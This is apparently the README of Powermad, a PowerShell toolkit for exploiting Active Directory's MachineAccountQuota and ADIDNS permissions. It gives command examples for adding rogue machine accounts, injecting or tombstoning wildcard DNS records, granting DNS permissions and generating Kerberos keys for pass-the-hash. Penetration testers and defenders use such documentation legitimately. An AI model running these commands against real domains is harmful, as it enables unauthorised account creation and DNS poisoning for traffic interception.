PowerShell MachineAccountQuota and DNS exploit tools
BSD-3-CLAUSE License
The default Active Directory ms-DS-MachineAccountQuota attribute setting allows all domain users to add up to 10 machine accounts to a domain. Powermad includes a set of functions for exploiting ms-DS-MachineAccountQuota without attaching an actual system to AD.
This function can return values populated in a machine account attribute.
Get-MachineAccountAttribute -MachineAccount test -Attribute discription
This function leverages the ms-DS-CreatorSID property on machine accounts to return a list of usernames or SIDs and the associated machine account. The ms-DS-CreatorSID property is only populated when a machine account is created by an unprivileged user.
Get-MachineAccountCreator
This function can disable a machine account that was added through New-MachineAccount. This function should be used with the same user that created the machine account.
Disable-MachineAccount -MachineAccount test
This function can enable a machine account that was disabled through Disable-MachineAccount. This function should be used with the same user that created the machine account.
Enable-MachineAccount -MachineAccount test
This function can add a new machine account directly through an LDAP add request to a domain controller and not by impacting the host systems attachment status to Active Directory.
The LDAP add request is modeled after the add request used when joining a system to a domain. The following (mostly validated by the DC) attributes are set:
A new machine account can be used for tasks such as leveraging privilege provided to the Domain Computers group or as an additional account for domain enumeration, DNS exploits, etc. By default, machine accounts do not have logon locally permission. You can either use tools/clients that accept network credentials directly or through the use of runsas /netonly or @harmj0ys Invoke-UserImpersonation/Invoke-RevertToSelf included with PowerView.
Machine accounts created with standard users will have the mS-DS-CreatorSID populated with the standard users SID.
Note that ms-DS-MachineAccountQuota does not provide the ability for authenticated users to delete added machine accounts from AD. Elevated privilege will need to be acquired to remove the account if you want to avoid passing the task off to your client.
Add a new machine account
New-MachineAccount -MachineAccount test
Use the added account with runas /netonly
runas /netonly /user:domain\test$ powershell
This function removes a machine account with a privileged account.
Remove-MachineAccount -MachineAccount test -Credential $domainadmin
This function can populate some attributes for an account that was added through New-MachineAccount, if a user has write access. This function should be used with the same user that created the machine account.
Here is a list of some of the usual write access enabled attributes:
Remove the trailing '$' from the SamAccountName attribute
Set-MachineAccountAttribute -MachineName test -Attribute SamAccountName -Value test
Use the modified account with runas /netonly
runas /netonly /user:domain\test powershell
This function leverages New-MachineAccount to recursively create as many machine accounts as possible from a single unprivileged account through MachineAccountQuota. See the following blog post for details:
By default, authenticated users have the 'Create all child objects' permission on the Active Directory-Integrated DNS (ADIDNS) zone. Most records that do not currently exist in an AD zone can be added/deleted.
This function can be used to add/delete dynamic DNS records if the default setting of enabled secure dynamic updates is configured on a domain controller. A, AAAA, CNAME, MX, PTR, SRV, and TXT records are currently supported. Invoke-DNSUpdate is modeled after BIND`s nsupdate tool when using the '-g' or 'gsstsig' options.
Add an A record
Invoke-DNSUpdate -DNSType A -DNSName www -DNSData 192.168.100.125
Delete an A record
Invoke-DNSUpdate -DNSType A -DNSName www.test.local
Add an SRV record
Invoke-DNSUpdate -DNSType SRV -DNSName _autodiscover._tcp.test.local -DNSData system.test.local -DNSPriority 100 -DNSWeight 80 -DNSPort 443
This function can tombstone an ADIDNS node.
*Tombstone a wildcard record. `Disable-ADIDNSNode -Node *
This function can turn a tombstoned node back into a valid record.
Enable-ADIDNSNode -Node *
This function can return values populated in a DNS node attribute.
Get-ADIDNSNodeAttribute -Node test -Attribute dnsRecord
This function can return the owner of an ADIDNS Node.
Get-ADIDNSNodeOwner -Node test
This function gets a DACL of an ADIDNS node or zone.
Get the DACL for the default Active Directory-Integrated Zone from a domain attached system.
Get-ADIDNSPermission
Get the DACL for a DNS node named test from a domain attached system.
Get-ADIDNSPermission -Node test
This function can return ADIDNS zones.
Get-ADIDNSZone
This function adds an ACE to a DNS node or zone DACL.
Grant-ADIDNSPermission -Node * -Principal "authenticated users"
This function adds a DNS node to an Active Directory-Integrated DNS (ADIDNS) Zone through an encrypted LDAP add request.
New-ADIDNSNode -Node * -Tombstone
This function creates a valid byte array for the dnsRecord attribute.
New-DNSRecordArray -Data 192.168.0.1
This function gets the current SOA serial number for a DNS zone and increments it by the set amount.
New-SOASerialNumberArray
This function can rename a DNS node.
Rename-ADIDNSNode -Node test -NodeNew test2
This function can remove a DNS node.
Remove-ADIDNSNode -Node *
This function removes an ACE to a DNS node or zone DACL.
Revoke-ADIDNSPermission -Node * -Principal user1 -Access GenericAll
This function can append, populate, or overwrite values in a DNS node attribute.
Set-ADIDNSNodeAttribute -Node test -Attribute description -Value "do not delete"
This function can set the owner of a DNS Node. Note that a token with SeRestorePrivilege is required.
Set-ADIDNSNodeOwner -Node test -Principal user1
This function can generate Kerberos AES 256 and 128 keys from a known username and password. This can be used to test pass the hash in invoke-DNSUpdate.
Get-KerberosAESKey -Salt TEST.LOCALuser